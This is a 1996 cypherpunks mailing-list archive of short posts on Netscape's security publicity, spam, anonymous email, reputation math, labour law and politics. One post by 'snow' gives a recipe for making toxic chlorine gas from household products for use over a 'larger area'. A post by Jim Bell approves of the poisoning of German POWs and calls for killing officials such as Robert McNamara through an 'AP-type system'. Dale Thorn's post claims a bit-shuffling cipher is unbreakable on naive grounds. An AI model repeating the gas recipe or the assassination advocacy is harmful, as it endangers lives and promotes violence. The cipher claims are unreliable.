Message-ID: <Pine.LNX.3.93.960915164109.1513A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Sep 1996 pgut001@cs.auckland.ac.nz wrote:
> >`any publicity is good publicity' syndrome.  There was a *lot* of publicity,
> >and Netscapes response in fixing the problem was good.  Several US cypherpunks
> >were tracking the stocks at the time, and could probably verify this.
> Interesting... does anyone want to comment on this?  This kind of damages one
> of my assumptions in the paper that publicity attacks can hurt a company
> providing poor security.  Could it be that at the time people would buy
> Netscape stock no matter what happened?  If MSIE had been widespread at the
> time, would it have caused people to jump ship en masse?

     I think one issue that may come into this is that while the kind of peopl
who read this list worry about security issuse like the above, the average, or
rather most (I'd off-the-cuff estimate almost all) of the users of netscape
don't use the security features, and don't understand them. If they know what
they are doing, they expect that at some point in the future NEED the security,
but don't use/need it now. 
  
     What publicity Netscape recieved was probably very minor in the
mainstream media, and Netscapes damage control was most likely quite effective.
I spend very little time with the mainstream media, I really don't know. 

     I could be very very wrong about most or all of this, but I think that 
people on this list would tend to be just a little bit more concerned and 
knowlegable about security and privacy issues, and hence a little more 
judemental (in a good way) on those issues. 
 
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 16 Sep 1996 12:12:13 +0800
To: John Young <jya@pipeline.com>
Subject: Re: MTH_ead
In-Reply-To: <199609141641.QAA11110@pipe4.t2.usa.pipeline.com>
Message-ID: <323C975D.156@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
>    9-14-96. WaPo:
>    "Empty-Head Network Fails to Link TWA Crash to Terrorism."
>       The frantic overseas intelligence-gathering effort,
>       which has included eavesdropping, use of informants and
>       offers of large cash payments for leads, has been
>       undertaken by the CIA, the NSA and the DEA, as well as
>       a number of foreign investigative agencies. The NRO has
>       analyzed voluminous archives of intelligence drawn from
>       spy satellites, intercepted phone calls and electronic
>       eavesdrops gathered before the crash.
>       Since right after the TWA crash, the NSA started
>       monitoring phone conversations of people believed to
>       have ties to terrorists groups, as well as trying to
>       track the movements of suspected terrorists. The CIA,
>       working through its sources, has been offering money for
>       leads on any kind of terrorist role. The DEA has been
>       using overseas agents to gather intelligence; the FBI
>       liaisons stationed in 23 countries are working to gather
>       intelligence on the crash; and Scotland Yard and the
>       Mossad are also empty-handed (not Red-handed -- yet).
>    http://jya.com/mthead.txt  (10 kb)
>    MTH_ead

All these multi-BILLION-dollar agencies, seeming to have no clue?
Is this not a suggestion of some kind of inside job?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Vagner <jlv@signet.sig.bsh.com>
Date: Mon, 16 Sep 1996 09:09:12 +0800
Subject: Re: Internet Drivers' Licenses
In-Reply-To: <199609132026.NAA15888@netcom9.netcom.com>
Message-ID: <Pine.SGI.3.95.960915170645.22199D-100000@www>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Sep 1996, Mike Duvos wrote:

> I am now getting more junk email than email from people I 
> care to correspond with.  It seems one can't even read the
> scholarly newsgroups anymore without "Come Watch Us Lick
> Ourselves on the Web" messages popping up regularly.

Not only that, but the <alt.binaries.pictures.-> newsgroup have all gone
to hell with commercial ads.

jlv





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 16 Sep 1996 11:56:57 +0800
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <Pine.HPP.3.91.960914190237.14123A-100000@cor.sos.sll.se>
Message-ID: <323C9BC1.2160@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Asgaard wrote:
> On Fri, 13 Sep 1996, Timothy C. May wrote:
> The 70% already _are_ cutting the throats of the other 30%. It's
> called a 60%+ tax rate. This is the sum of: federal income tax, state 
> income tax, Most of these taxes are not used for feeding the poor but 
> to support the Nomenclatura of the Bureaucracy and we all want to get 
> rid of that.
>
> Cf. what sociologists call "the demographic transition." Countries
> that value learning and wealth are _not_ facing a population problem. 
> In fact, many such countries are now at "below replacement" birth 
> levels.
> And that's good. The world population really should go back to around
> 1 billion for achieving a stabile ecology (with singing birds for
> the peace of minds). The former (?) US system of encouraging young
> standalone women to make babies to get benefits was very bad. The
> Chinese system - less benefits the more children you have - is the
> way to go.

Just a comment: "The world population really should go back to around 
one billion", etc. And how could we achieve that without severe govt. 
oppression, one wonders? Now, I've heard of "education" being used to 
help the masses learn to be responsible citizens ad nauseam, but since 
education is pretty much just propaganda in the massively-capitalist 
system now taking over even the P.R. of China, how the heck is education 
going to work?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 16 Sep 1996 10:23:07 +0800
To: "David M. Rose" <drose@AZStarNet.com>
Subject: Re: That Evil Internet, Pt. XXIII
In-Reply-To: <199609120410.VAA11385@web.azstarnet.com>
Message-ID: <Pine.LNX.3.93.960915170908.1513E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Sep 1996, David M. Rose wrote:
> Caught an interesting segment on this evening's PBS news program with Jim
> Lehrer.
> Two senators were discussing whether the U.S. should sign the international
> agreement banning chemical warfare.
> Sen. Kyl maintains that verification is impossible and that Iraq, Libya, and
> North Korea will never participate.
> Sen. Nunn responds that we should sign anyway.  Besides, he adds in the non
> sequitur of the week, anyone can get instructions on how to build chemical
> weapons on the Internet.
> I guess the Internet isn't just for pornography and conventional bomb-making
> advice anymore.

     WARNING: DANGEROUS. 

     Simple advice for the manufacture of Chlorine Gas (similar enough to 
mustard gas that it has the same effect). 

     1 bottle of Chlorine Bleach.
     1 Bottle of lime-away.

     Hold Breath, mix in open container. Clear the building before you breathe
again. 

     Use more bottles for a larger area.

     I did this accidentally when I was young (16), foolish and working 
for a hospital. That it happened at work (_very_ small amounts of both bleach
and lime-away) made the Emergency Room visit free and quick. No permanent
damage, but I was lucky.  

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 16 Sep 1996 10:52:51 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: (Fnord) Edupage, 10 September 1996
In-Reply-To: <199609120436.VAA06548@mail.pacifier.com>
Message-ID: <Pine.LNX.3.93.960915172126.1513I-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Sep 1996, jim bell wrote:
>  And does he want to be  punished, or merely stopped?


     Given the social scene in D.C., I'd bet he wants to be punished.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Mon, 16 Sep 1996 11:51:02 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Mobile IP URL typo
In-Reply-To: <199609152358.QAA19813@dfw-ix6.ix.netcom.com>
Message-ID: <199609160045.RAA16241@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> >locations.  See http://www.ietf.org/html-charters/mobileip-charter.html,
> >or search for "Mobile IP" in a web search engine.
> That URL got 404-NotFound...

s/-/.

http://www.ietf.org/html.charters/mobileip-charter.html

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 16 Sep 1996 09:53:16 +0800
To: gregburk@netcom.com (Greg Burk)
Subject: Re: Reputation in action
In-Reply-To: <7654f2dw3r@netcom.com>
Message-ID: <199609152246.RAA17894@homeport.org>
MIME-Version: 1.0
Content-Type: text


Greg Burk wrote:

| Well, this looks like a chance to quickly correct some mistakes without
| spending a lot of time framing the issue.
| 
| tcmay@got.net (Timothy C. May) writes:
| > But this latest episode illustrates the role of reputations. Namely, my own
| > reputation is not being harmed by bizarre commentaries from the Vulis-bot.

| And it seems to me that your usage of "reputation" has at different
| times meant both direct and indirect exposure. This clearly discards
| important information, often to the detriment of your analysis. Perhaps
| you can explain why the two separate things are the same in some
| important way, aside from merely that they both involve esteem.

	A while back (Sept 94) I sketched out a system for using a
numeric indicator (from -1 through 1) as an indicator of how
interested (likely to read) you were in someone else's postings.  I
suggested that simple multiplication could achieve useful results.  If
I respect Alice 50% of the time, and Alice respects Bob 50% of the
time, then a rough cut at my interest level in Bob would be 25%.  If
Alice disrespects Charles 90% of the time, that gives him a negative
45% in my book.

	By generating simple numbers like this, I can tune my
tolerance level based on time.  Its not perfect, but roughly works.

	Deranged Mutant pointed out that radically different opinions
by a few people might cause the system to start behaving chaoticly,
and Hal also had some interesting comments.  Check the archives.

| > In the mathematics of reputations, a negative reputation held by one whose
| > own reputation is negative is a positive.
| 
| I don't think this is an example of any such thing. I would not respect
| a person even a tiny bit more just because a kook disrespects them. In
| fact, since the kooks frequently hold each other in very low esteem, the
| suggested polarity-math is self-contradictory.
| 
| Rather, I think this is an example of how direct exposure supercedes
| reputation.

	Kooks do mess things up a bit; but most people aren't kooks.
My enemies enemy is my friend is oft true.

	In the system I outlined, direct exposure clearly does
supercede reputation, except in the (possibly rare) case where you
respect someone else more than you respect yourself.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 16 Sep 1996 11:05:36 +0800
To: HipCrime <robert@precipice.v-site.net>
Subject: Re: mailing lists
In-Reply-To: <3238648F.207@precipice.v-site.net>
Message-ID: <Pine.LNX.3.93.960915174531.1513L-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, HipCrime wrote:
> Well, "doctor" why can't you see (with your logic) that junk Email (or
> "spam") would save many, many forests if it REPLACED junk SnailMail.
> Isn't it just that your "irrelevant feelings" have been hurt, because
> someone used your remailer-baby in a way you hadn't planned for ?!?
> Why not put your money where your mouth is, and bet me (any amount),
> that spam WILL be socially acceptable by the year 2000.  Particularly,
> when the green-folks discover how many trees will be saved.  It'll be
> a social-mandate, NOT just a suggestion.  Want to bet?

     I'll accept junk email when it costs more to send it than recieve it. 
I don't have to pay for my incoming snail mail service. Most do for email. 
You are speaking on my dime, and that isn't FREE SPEECH. You want to talk, 
you pay. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 16 Sep 1996 10:58:07 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Informal Renegotiation of the Law
In-Reply-To: <2.2.32.19960912204730.006977ac@panix.com>
Message-ID: <Pine.LNX.3.93.960915175252.1513M-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, Duncan Frissell wrote:
> Many people on this list and in the larger world focus on laws and
> regulations and sometimes act as if that is the only way that the relative
> rights and duties of governments and civilians are established.  In fact,
> there is a lot of informal negotiation going on all the time.  This is
> significant because an unenforced law isn't a law at all.

     Does does the phrase "Selective Enforcement" mean anything? 

> For example, you will not read anywhere that compulsory education laws have
> been repealed -- but they have.  When the home schooling movement started in
> the late 1970s, there were occasional harassment and prosecution of parents.
> The home schoolers won some and lost some.  As time went on, the authorities
> came to accept home schoolers so that at this point, legal problems are
> rare.  Compulsory education has been effectively repealed by the actions of
> refusenicks in both the subject population and the enforcement population.  

     Their children are still getting educated. Not thoroughly enough in 
some cases, but educated in the basics. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Sun, 15 Sep 1996 16:34:07 +0800
To: cypherpunks@toad.com
Subject: Re: Exactly the point Lance... [Fwd: HipCrime and Art]
In-Reply-To: <199609141912.NAA13899@rintintin.Colorado.EDU>
Message-ID: <199609150555.RAA03096@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Sep 1996 13:08:22 -0600, Admin <admin@superhot.com> wrote:

   Exactly the point, bingo!  The point is this, exactly what do YOU define as
   *fucking shit* so that anyone who visits your page will know exactly what
   they can and can't say to Lance Cottrell. We've determined that you don't
   want to receive the HipCrime URL from your mailto: button. What about the
   next visitor who comes across your page, how will they know exactly what you
   do or do not find interesting? Will you put a lengthy *what I expect from
   all correspondents who use my mailto: button* explanation on the page?

   Perhaps a simple, *don't mail me unless I already know you and want to hear
   what you have to say...* tag?

I think it's fairly obvious that any mailto tag on Lance's *Mixmaster
page* is for comments and suggestions concerning Mixmaster, or the
page itself.  URLs about fractal art, who killed JFK, and your
favourite episode of The X Files could then be expected to be
considered *fucking shit*.

As you seem to feel that being accessible by email is licence for
anyone to send you anything they want unless they have specific
knowledge that you don't want to receive it, and given that I have no
knowledge about what you don't want to receive, I'm going to set up a
spider to trawl the web and mail you every single URL it encounters,
in the certain knowledge that you consider this legitimate use of your
address :-)

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
I'm having an emotional outburst!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 16 Sep 1996 09:53:24 +0800
To: cypherpunks@toad.com
Subject: Re: Fed appellate judge remarks re anonymity, free speech o
Message-ID: <9609152200.AA06978@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Sep 96 at 20:14, paul@fatmans.demon.co.uk wrote:

> >The article quotes Kozinski as saying "I have a severe problem with
> >anonymous E-mailers . . . You don't have a right to walk up to
> >somebody's door and knock with a bag over your head." The article
> >says Kozinski likened anonymous E-mail to menacing someone.

> What is the offense involved then, going bagged in a public place?
> since when do I or anyone else not have the right to wear a bag on
> my head?

<BS_mode> Make-up should be outlawed!  The potential for turning
oneself into an anonymous creature is *way* to big for not being
alarming.  There ought to be a law!
<BR>
And beside, although it is
often used as an enhancing tool, of what use is the little and
irrelevant egoist human pleasure of looking "nice" when we are
viewing things from the standpoint a sensitive and poor and
terrified child or frail and defenseless woman? 
</BS_Mode>

jfa
Jean-Francois Avon, Montreal QC Canada
"One of theses centuries, the brutes, private or public, who believe
that they can rule their betters by force, will learn the lesson of
what happens when brute force encounters mind and force."
                                              - Ragnar Danneskjold
PGP key at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 16 Sep 1996 10:58:07 +0800
To: HipCrime <robert@precipice.v-site.net>
Subject: Re: common sense
In-Reply-To: <323896EE.3BC3@precipice.v-site.net>
Message-ID: <Pine.LNX.3.93.960915180215.1513N-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, HipCrime wrote:

> > And rather than "dispensing drugs in clinics," why not simply
> > scrap the drug laws entirely?  People have a *right* to do as
> > they please with their bodies.
> Let's hear it for common sense.  It's the first decent posting I've
> seen to this list.

     Then shut up and read a while. It will do you good.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 16 Sep 1996 12:05:09 +0800
To: cypherpunks@toad.com
Subject: Cryptography of a sort - redux
Message-ID: <323CADBE.3D54@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


If anyone remembers my original postings from a couple weeks ago (my
first-ever on The Net), I described a method to "shuffle" bits in a
text-stream, using simple random-number generators, to insure that the
text cannot be descrambled by brute-force methods.

It has occurred to me only after this time that there was significant
misinterpretation of what I proposed. I do not change any bits of text,
I merely reposition them, therefore there is no applicability of
standard analysis techniques (XOR masking, whatever) to the decoding
process. The result file contains the same number of zero and one bits
as it started with, through any number of encryption layers.

The only way to recover the original text is to reposition the shuffled
bits correctly, which requires brute-force guessing of the
pseudo-random-number output. This guess is very simple for the first
encoding layer, but compounds exponentially in subsequent encodings, so
that after half a dozen or a dozen passes, where the executable
program(s) is called from scratch for each pass, the shuffling rapidly
approaches true randomness, and cannot be decrypted in practice except
through the exact mirror-image reversal of the encryption passes.

An example: How long would it take for you to guess the number (between
0 and 32000) I'm thinking of, if you could guess 16 billion numbers per
second? Would it be .000001 second, on average?

If you had to guess the ten different numbers I'm thinking of, and get
all ten correct sequentially, it should take an essentially infinite
amount of time, yes? And remember, since computer bits have such low
differentiation (ones and zeros), looking for "patterns" and so forth
just doesn't apply in this type of encryption.

As to the Public Key part of the argument, once there is general
understanding on the above points at large, it might then be worthwhile
to discuss the advantages and disadvantages of how to make/distribute 
Private keys, etc.

One gentleman on this forum made an argument recently, something to the
effect that it wouldn't be worthwhile for Hacker X to try to break into
datastream Y, assuming datastream Y is encoded with such-and-such a key,
that datastream Y is sufficiently unimportant, and motive for such a
breakin would not be great enough to justify the expected effort.

To such arguments, all I can say is, this is the computer age, and
enough mundane transactions can add up to something significant, or, one
could lower the expected-effort ratio, you get the picture.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 16 Sep 1996 11:50:24 +0800
To: hallam@ai.mit.edu>
Subject: Re: What is best policy paper on crypto?
Message-ID: <ae625d9f010210043e1c@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 7:18 PM 9/12/96, Gregg Cooke wrote:
....
>
>        I'm gonna stick my neck out here and ask a naive question: where
>        can I find "the NAS report" mentioned in this thread?  Note that
>        I'm new to this list (2 days) so please be kind if this paper is
>        extremely well known (it's not known to me but it sounds like
>        something I need to read).
>
>                        -Gregg

I think that they meant the NRC (National Research Council) report. It is at:
<http://pwp.usa.pipeline.com/~jya/nrcindex.htm>.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 16 Sep 1996 14:07:16 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: SPL -- Suspicious Persons List
In-Reply-To: <3238B073.2847@ai.mit.edu>
Message-ID: <Pine.LNX.3.93.960915183113.1513P-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, Hallam-Baker wrote:

> Timothy C. May wrote:
> > Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming
> > in this morning. I'm sure you're busy, so I'll make this as short as
> > possible. OK with you?"
> > Joseph Shlubsky, Programmer: "Uh, sure." <nervously>
> Yeah, thats why we Europeans have labour laws that prevent
> Digitaltronics
> from doing any such thing without getting sued from here to eternity.
> Pity you guys missed out on the idea of trades unions and think that
> employment is some kind of serfdom in which you loose all your rights
> the 
> day you sign up. If you hadn't sold your government to the cooprorations
> a while back you might have got out of the middle ages.
> I suspect that even under the weak as dishwater employment laws that
> you have in the US would provide ample opportunity to file a
> countersuit.

     Right now. But consider: If Joe _worked_ for the federal government in 
*certain* areas, or a government contractor in *certain* areas, this could 
happen. 

> When that type of thing happens, they don't give the reason, they do
> it behind closed doors. How do you fight that?


     Work for the competition, or start your own company. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 16 Sep 1996 13:59:24 +0800
To: HipCrime <robert@precipice.v-site.net>
Subject: Re: who can count?
In-Reply-To: <3238B18E.7211@precipice.v-site.net>
Message-ID: <Pine.LNX.3.93.960915183458.1513Q-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, HipCrime wrote:

> > No, this b.s. is more like having someone put a dead skunk in my 
> > mailbox, with no return address, trying to prevent me from sending 
> > them 100 dead skunks as a return favor. And about as welcome.
> 100 dead skunks in exchange for ONE is exactly what this discussion
> is all about.  You CypherWIMPS just love over-kill.  EmailRobot sent
> ONE message to EACH address.  Are you guys so unskilled in arithmetic
> to understand the difference between 1 and 100?
> One message is NOT spam, 100 messages to a single box IS spamming.

     One mesage sent to 100 addresses, unsoliciated IS spam. One message 
sent to One address isn't. It IS still junk mail. 

     Overkill is a time honored concept for making sure the job is done. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 16 Sep 1996 14:28:46 +0800
To: HipCrime <robert@precipice.v-site.net>
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
In-Reply-To: <3238BD18.64F8@precipice.v-site.net>
Message-ID: <Pine.LNX.3.93.960915184009.1513R-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, HipCrime wrote:

> > I'd view "comment" as expressing an opinion. If I put an "email to:" 
> > tag on a web site, I'm inviting "comment" on the information I've 
> > placed in public view 
> A message sent to a MAILTO button on a WebPage, which contains the URL 
> of another WebPage is EXACTLY on-topic.  It's my belief that any active 
> "webmistress" would be interested in what other sites have to offer.

     Then register with the Search Engines and Indexers. That is where 
people go when they are looking for information. Don't go putting 
shit in my mail box. Very few people who are looking for information (other
that "web sufers" will automatically fire up netscape and take a look at 
any URL that wanders down the road. If you put up a site that is for the 
web potato crowd, then I doubt you have anything I want to look at. 

     Of course from what you spout, I seriously doubt that you have anything
I want to read anyway.  

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jyy@gnn.com (John Young)
Date: Mon, 16 Sep 1996 10:51:29 +0800
To: cypherpunks@toad.com
Subject: Pipeline Down
Message-ID: <199609152328.TAA01262@mail-e2b-service.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


Pipeline appears to be down. Maybe a SYN sin, maybe just a Sunday sin.

If any unanswered messages to jya@pipeline.com, try jyy@gnn.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: research@isr.net (Research Unit I)
Date: Mon, 16 Sep 1996 11:04:45 +0800
To: cypherpunks@toad.com
Subject: ISR on the web
Message-ID: <19960915235105328.AAA680@ISIS.nso.org>
MIME-Version: 1.0
Content-Type: text/plain


Internet Security Review is now available on the web.
Have a look at http://www.isr.net

==





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 16 Sep 1996 11:50:44 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <ae61bb3e00021004ed98@[207.167.93.63]>
Message-ID: <woNBuD58w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> Crypto Anarchy means getting rid of deadwood the old-fashioned way.

Starting with the lying old fart himself.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 16 Sep 1996 11:18:49 +0800
To: stewarts@ix.netcom.com
Subject: Re: Juno Newbies are Great!
Message-ID: <01I9IRO3SO9G9ULPYZ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart" 14-SEP-1996 07:37:07.81

>- it's free.  Anybody can get on it.  Easily.  Anonymously, more or less,
>        since they don't need to have your whole credit history
>        to be able to charge you money.  At most you need a maildrop.

	As has been previously pointed out, this also makes it nice for
disposable remailer front ends. Is anyone currently working on this
project?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Mon, 16 Sep 1996 12:12:22 +0800
To: cypherpunks@toad.com
Subject: Re: SPL -- Suspicious Persons List
In-Reply-To: <Pine.LNX.3.93.960915183113.1513P-100000@smoke.suba.com>
Message-ID: <9609160104.AA32697@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain




>     Work for the competition, or start your own company. 

Easy enough for you or me who can charge the minimum wage rate
for an hour for a period more like a minute.

The point is that Perry was making an appeal to "fairness" in which
the cause of the unfairness is pretty much immaterial. If you believe
that Digitronics has the right to behave as described then why don't
they have the right to draw up lists of suspicious people. 

We've seen libertopia - its the world of Neuromancer or Bladerunner.
When I described it "Medieval" on a talk show recently, William Gibson 
responded with the term "Reaganite". 

Being opposed to government slavery isn't enough. Coorporate slavery
is just as bad. Unless people are enfranchised ecconmically as
well as politically the political liberties don't matter much. 

I'm quite happy to allow Bill G. the run of the Internet because if
he becomes too powerful and becomes a threat to society itself I 
don't mind the used of government power to break up a monopoly. On
the other hand various people on this list get tied up in knots
trying to have it both ways, to be pro-coorporatism in general
but anti the kind of coorporatism that they don't like. 

I am on an SPL that is run by an organisation called the "Ecconomic
League". It is an organisation run by the UK Conservative party 
which keeps lists of "unsafe" employees. Of course the list is 
available for government repression as well if they choose - except
that few would give it any credibility. 


In November 55 odd percent of the population will vote for 
Clinton who is not an opponent of government. About 35% will
vote for Dole who is even more pro-government having spent
his time in the Sentate getting favours for friends like
Archer-Daniels-Midland. Most of the remainder will vote for 
Dole appart from an insignificant number that will vote for 
the Libertarian and Green candidates. 

If you insist on such a selective interpretation of rights 
you will continue to be ineffective since the Libertarian party
cannot get anywhere under the US electoral system and the
Republican party is at present controlled by the control freaks
of the Christian Coalition.

If on the other hand you ditch the ecconomic rhetoric you can
be very influential on the left because they are looking for ways
to capture traditional republican positions. With the Republicans
proposing seven consitutional ammendments in their platform that
leaves open an opportunity for the Democrats to step in as the
protectors of the constitution. If someone can work out a way 
of squaring the Freeh situation you can basically write the 
platform for Gore's campaign in 2000.


		Phill








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 16 Sep 1996 14:37:01 +0800
To: cypherpunks@toad.com
Subject: Re: The Living and the Dead
Message-ID: <199609160416.VAA08027@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:54 AM 9/16/96 GMT, John Young wrote:

>   The Washington Post has two heart-breaking pieces today 
>   on a new book about Vietnam, "The Living and the Dead: 
>   Robert McNamara and Five Lives," by Paul Hendrickson. 
> 
>   The book tracks the disaster being formulated in 1965 by 
>   DC top-down policy interleaved with savagery to five 
>   grunts in bloody battle. 
> 
>   There's a laudatory review of the grim book, and a long 
>   magazine piece gives an excerpt which includes some of 
>   Life's photos of a Marine copter gunner's transition from 
>   happy-go-lucky, to butchery of buddies, to grief-stricken 
>   collapse. It reawakens what's never forgot. 
> 
>   That April, 1965, Life photo-essay, "One Ride With Yankee 
>   Papa 13," turned up in a sidewalk stall today so we'll 
>   put 18 photos on our Web page for a glimpse back to the 
>   future of power-mad policy begetting slaughter. 

ObAP comment:  A few weeks ago, the tv show "60 Minutes" ran an item about a 
group of Jews who, after the end of WWII, vowed revenge on the Nazis, down 
to German soldiers, plotting to kill as many as they could.  In their 
biggest coup, they killed hundreds of Germans in a POW camp by poisoning 
their bread.

My reaction?  As you might expect, I think that the main thing they did 
wrong was to not kill enough of them, but more particularly to not target 
the higher-ups.  The way I see it, the fundamental reason that people will 
continue to participate in holocausts, even today, is that they see no real 
prospect of being punished for their crimes.

Unfortunately, society has been conditioned if not to "forgive and forget," 
at least to not punish where it has an opportunity to punish.  I suggest 
that this is no accident:  It is in the interest of tyrants everywhere to 
let the other guy off easy, lest he be in the same position someday.  This 
is why numerous African and South American dictators were allowed to 
"retire" in peace, rather than being killed.

How would an AP-type system treat Robert McNamara?  He'd be dead in a 
second.  To those who say, "What good would this do?" I respond: Anyone in 
the American government today who is considering an adventure which MIGHT 
turn into another Vietnam should be deterred by the knowledge that sometime, 
in 30 minutes or 30 years, he could be killed for what he did.   Robert 
McNamara, presumably, did what he did because he thought he'd never be 
punished.  The best way to deter future governmental abuse is to remind 
these people that they _will_ be punished.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 16 Sep 1996 15:02:33 +0800
To: cypherpunks@toad.com
Subject: ComLaw> Down South
Message-ID: <199609160436.VAA09109@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Cross-post from commonlaw@teleport.com
At 09:11 PM 9/15/96 -0400, James M. Cobb wrote:
>    09 14 96 Associated Press distributes a newsstory headed: 
> 
>        MEXICAN REBELS WARN OF MORE 'SELF-DEFENSE' ATTACKS 
>                        AGAINST GOVERNMENT 
>    Points from the newsstory: 
>        Leaders of a violent new rebel group are vowing to 
>        press their war on Mexico's military and police.... 
> 
>        [Last month's] raids were the most widespread guerril- 
>        la attacks in Mexico in decades. 
> 
>        ...during the news conference, the rebel leaders... 
>        said that...bomb threats issued since last month's at- 
>        tacks were part of an outside campaign to discredit the 
>        group. 
>
>        They said their targets will continue to be government, 
>        not civilian, sites. 
>    Please note that word: OUTSIDE. 
> 
>    Imported from Atlanta. 
>    "Overnight" via NAFTA Express: 
>        [The rebel group's statement] cited "the TERROR and 
